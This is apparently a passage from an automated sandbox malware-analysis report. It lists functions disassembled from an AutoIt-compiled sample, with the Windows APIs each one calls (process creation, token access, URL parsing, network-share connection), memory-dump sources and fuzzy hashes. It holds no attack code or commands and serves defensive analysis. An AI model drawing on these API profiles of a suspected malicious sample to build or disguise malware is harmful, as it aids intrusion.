                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClientRectScreen$InvalidateWindow
                                    • String ID:
                                    • API String ID: 357397906-0
                                    • Opcode ID: e68399fbccfdae6458dc5534cf85acf1d83348456247ad3a664c47e1ae61d109
                                    • Instruction ID: 3343d81a75a20003ed736ee01574f06641a2eeb66585089b3705a6846a62b808
                                    • Opcode Fuzzy Hash: e68399fbccfdae6458dc5534cf85acf1d83348456247ad3a664c47e1ae61d109
                                    • Instruction Fuzzy Hash: D31132B9D0420DAFDB51CFA9C8849EEBBB9FF08310F108166E914E3620D735AA559F50
                                    Function 0090B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 0090B644
                                    • _memset.LIBCMT ref: 0090B653
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00946F20,00946F64), ref: 0090B682
                                    • CloseHandle.KERNEL32 ref: 0090B694
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateHandleProcess
                                    • String ID:
                                    • API String ID: 3277943733-0
                                    • Opcode ID: 7fbe8baf16e83e17acd45858a8927fa613d9bc6d52cf9254e16b214339817b99
                                    • Instruction ID: 29f8722dba481a545d08b9f35920930a716f089a15a576e6c41334dce1a352d8
                                    • Opcode Fuzzy Hash: 7fbe8baf16e83e17acd45858a8927fa613d9bc6d52cf9254e16b214339817b99
                                    • Instruction Fuzzy Hash: 3DF05EF65543047EF3202B65BC06FBB3A9CEB0B795F004060BA48E5592E7724C0497AA
                                    Function 008E6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 008E6BE6
                                      • Part of subcall function 008E76C4: _memset.LIBCMT ref: 008E76F9
                                    • _memmove.LIBCMT ref: 008E6C09
                                    • _memset.LIBCMT ref: 008E6C16
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 008E6C26
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                    • String ID:
                                    • API String ID: 48991266-0
                                    • Opcode ID: fa862622d0a9c1dd2e3d36fe57362408f49460f96aa116e63426e602941b15ae
                                    • Instruction ID: b2e3e52fecb15e7ffa10d9cc488784dcb95f04bc66a17dbd0655267802b4511e
                                    • Opcode Fuzzy Hash: fa862622d0a9c1dd2e3d36fe57362408f49460f96aa116e63426e602941b15ae
                                    • Instruction Fuzzy Hash: CDF05E3A204100BBCF116F99DC85A8ABB29FF46320F048061FE089E627D732E911DBB5
                                    Function 00882218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 00882231
                                    • SetTextColor.GDI32(?,000000FF), ref: 0088223B
                                    • SetBkMode.GDI32(?,00000001), ref: 00882250
                                    • GetStockObject.GDI32(00000005), ref: 00882258
                                    • GetWindowDC.USER32(?,00000000), ref: 008BBE83
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 008BBE90
                                    • GetPixel.GDI32(00000000,?,00000000), ref: 008BBEA9
                                    • GetPixel.GDI32(00000000,00000000,?), ref: 008BBEC2
                                    • GetPixel.GDI32(00000000,?,?), ref: 008BBEE2
                                    • ReleaseDC.USER32(?,00000000), ref: 008BBEED
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                    • String ID:
                                    • API String ID: 1946975507-0
                                    • Opcode ID: dca6913e89b02821c8cf5b689ea0d74e123ae3c7142f0f48cc0f3d90e3f71df6
                                    • Instruction ID: 160959e9283bfc24fb8505c22c1f93271634864138f7ebb42a8c35c821fbc242
                                    • Opcode Fuzzy Hash: dca6913e89b02821c8cf5b689ea0d74e123ae3c7142f0f48cc0f3d90e3f71df6
                                    • Instruction Fuzzy Hash: D6E03932118244AEDF715F64EC0D7E83B10EB05336F008366FA69880F187B14A90EB12
                                    Function 008D8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 008D871B
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,008D82E6), ref: 008D8722
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008D82E6), ref: 008D872F
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,008D82E6), ref: 008D8736
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    • Opcode ID: 4d6e4ffa7b728429bccbf41f20e703944abc514dc821944f85da3daf0eda38b0
                                    • Instruction ID: 98be24e1c9006a631811b8a0c618c8e775beec4a3b5e9e4c67a5dd5427ce4814
                                    • Opcode Fuzzy Hash: 4d6e4ffa7b728429bccbf41f20e703944abc514dc821944f85da3daf0eda38b0
                                    • Instruction Fuzzy Hash: D3E08636629211DFD7305FF45D0CB563BBCEF50BD1F148828B245D9040DA348545E750
                                    Function 008DB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OleSetContainedObject.OLE32(?,00000001), ref: 008DB4BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ContainedObject
                                    • String ID: AutoIt3GUI$Container
                                    • API String ID: 3565006973-3941886329
                                    • Opcode ID: 89e7b8ca693b53276849e911c8d8e3c82d0dc8404f61e4c8bda9cafbe3b4c887
                                    • Instruction ID: 24af786e531910dd574d20fc510d8edf791a95b4ba1f813faaf53e770b41e4d0
                                    • Opcode Fuzzy Hash: 89e7b8ca693b53276849e911c8d8e3c82d0dc8404f61e4c8bda9cafbe3b4c887
                                    • Instruction Fuzzy Hash: 7D913870600605EFDB24DF68C884A6ABBF5FF49714F21866EE94ACB791DB70E841CB50
                                    Function 008EAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0089FC86: _wcscpy.LIBCMT ref: 0089FCA9
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • __wcsnicmp.LIBCMT ref: 008EB02D
                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 008EB0F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                    • String ID: LPT
                                    • API String ID: 3222508074-1350329615
                                    • Opcode ID: 35352e561c454a3e9cf46976b3b09cf76253efa4e475b0acb4ebcd31ca5244b2
                                    • Instruction ID: 86e809d2f711b530cb3a5428560199754249ba050dba4c114a11084ff1cc2ae3
                                    • Opcode Fuzzy Hash: 35352e561c454a3e9cf46976b3b09cf76253efa4e475b0acb4ebcd31ca5244b2
                                    • Instruction Fuzzy Hash: 5D617F75A00219AFCB14EF99C891EAFB7B4FF09314F144069F956EB291D730AE44CB91
                                    Function 00892957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00000000), ref: 00892968
                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00892981
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: GlobalMemorySleepStatus
                                    • String ID: @
                                    • API String ID: 2783356886-2766056989
                                    • Opcode ID: 3edde85e9f7d12905c60a1b44a0357210abb4f688997793882e194a9ad68cc18
                                    • Instruction ID: 7fd7a4dbdff868b0a030c644bcf2d0b2e2c671de1ebfc6bc92658d438c94270b
                                    • Opcode Fuzzy Hash: 3edde85e9f7d12905c60a1b44a0357210abb4f688997793882e194a9ad68cc18
                                    • Instruction Fuzzy Hash: AA5144724187449BD320EF14D886BAFBBE8FF85344F81885DF2D9810A1EB308569CB67
                                    Function 008E9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00884F0B: __fread_nolock.LIBCMT ref: 00884F29
                                    • _wcscmp.LIBCMT ref: 008E9824
                                    • _wcscmp.LIBCMT ref: 008E9837
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _wcscmp$__fread_nolock
                                    • String ID: FILE
                                    • API String ID: 4029003684-3121273764
                                    • Opcode ID: e6721c65469260b69b23a991796ebef143034b56842e37e18792b0b102fdee11
                                    • Instruction ID: 2b8c3e8570fde601defefd5cbf201a2cf562fb2a7f43848ac22a4a8c77585de4
                                    • Opcode Fuzzy Hash: e6721c65469260b69b23a991796ebef143034b56842e37e18792b0b102fdee11
                                    • Instruction Fuzzy Hash: 2941A772A0025ABADF20AAA5CC45FEFB7B9FF86714F000479F904E7191DAB199048B61
                                    Function 008F258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 008F259E
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008F25D4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CrackInternet_memset
                                    • String ID: |
                                    • API String ID: 1413715105-2343686810
                                    • Opcode ID: 7cdac23ba206c319908b5f545af0e0e243e30583b7cf790d0e74bb4d0dfcbb77
                                    • Instruction ID: 7b92d0e55a17e270c614b32a982da7f6c01ce2cddbaa9749f11b57a7158e024f
                                    • Opcode Fuzzy Hash: 7cdac23ba206c319908b5f545af0e0e243e30583b7cf790d0e74bb4d0dfcbb77
                                    • Instruction Fuzzy Hash: AB310571804119EBCF11EFA8CC85EEEBFB8FF18310F100069F915E6162EA359A56DB61
                                    Function 00907A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00907B61
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00907B76
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: '
                                    • API String ID: 3850602802-1997036262
                                    • Opcode ID: b3583ded150fa11cc58d85b627098559009fdddbd887077c4dc0061d54af33dd
                                    • Instruction ID: cd6eec688ca5ee169135aa1ea326ce966192faf083ea7ae108792cc762857770
                                    • Opcode Fuzzy Hash: b3583ded150fa11cc58d85b627098559009fdddbd887077c4dc0061d54af33dd
                                    • Instruction Fuzzy Hash: EC410774E052099FDB14CFA4C881BEABBB9FF09310F10416AE905EB391D770A951DFA0
                                    Function 00906A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 00906B17
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00906B53
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    • Opcode ID: c678f641b0c6082737adb3e2a5b35f413f5054f19f96541ff48a584a156a02b1
                                    • Instruction ID: 71f89cba740051826fd2df05ae00a077d8de5d0fbe5b67ab576da01e2b73cf8c
                                    • Opcode Fuzzy Hash: c678f641b0c6082737adb3e2a5b35f413f5054f19f96541ff48a584a156a02b1
                                    • Instruction Fuzzy Hash: D9318F71210604AEDB109F68CC91BFB77ADFF48764F108629F9A5D7190DB31AC91D760
                                    Function 008E28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 008E2911
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008E294C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 34c25b1b7abf37afd461197d9cb6c6485825f570469348b50b5f85ee7524cebd
                                    • Instruction ID: 645a248ca8e013a9f1de8ceaefbfc19e924d673097f6a995e7361d5f476c5fd8
                                    • Opcode Fuzzy Hash: 34c25b1b7abf37afd461197d9cb6c6485825f570469348b50b5f85ee7524cebd
                                    • Instruction Fuzzy Hash: 1D31D1716003899BEB24EF5ACC45FAEBFACFF07350F141069E985E61A2DB709940CB11
                                    Function 008F39E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                    Download Yara Rule
                                    APIs
                                    • __snwprintf.LIBCMT ref: 008F3A66
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __snwprintf_memmove
                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                    • API String ID: 3506404897-2584243854
                                    • Opcode ID: bb2ddbc90d722b3aa08156e945ec65d41f506de6fd4ce7fd646b3f102520ff50
                                    • Instruction ID: b26d05fa72146b720562abf6813cb90104e56789c12f1be022d4ab49cff3e3b2
                                    • Opcode Fuzzy Hash: bb2ddbc90d722b3aa08156e945ec65d41f506de6fd4ce7fd646b3f102520ff50
                                    • Instruction Fuzzy Hash: AA215E7160062DAECF10EFA9CC82AAEBBB5FF44704F500455F545E7182DA30EA45CB62
                                    Function 009066D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00906761
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0090676C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: 514fab7f9da8b14f5e77d7b1a68c1789766de68611824613bcefe7630c214c58
                                    • Instruction ID: 6eb3cfaf8150c69e589ec29d2b564b01fe55af1a968320b7e870be34ae4b58af
                                    • Opcode Fuzzy Hash: 514fab7f9da8b14f5e77d7b1a68c1789766de68611824613bcefe7630c214c58
                                    • Instruction Fuzzy Hash: 69118675210209AFEF119F54CC81EAB37AEEB84368F114125F914972D1D775DC6197A0
                                    Function 00906C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                      • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                      • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                                    • GetWindowRect.USER32(00000000,?), ref: 00906C71
                                    • GetSysColor.USER32(00000012), ref: 00906C8B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
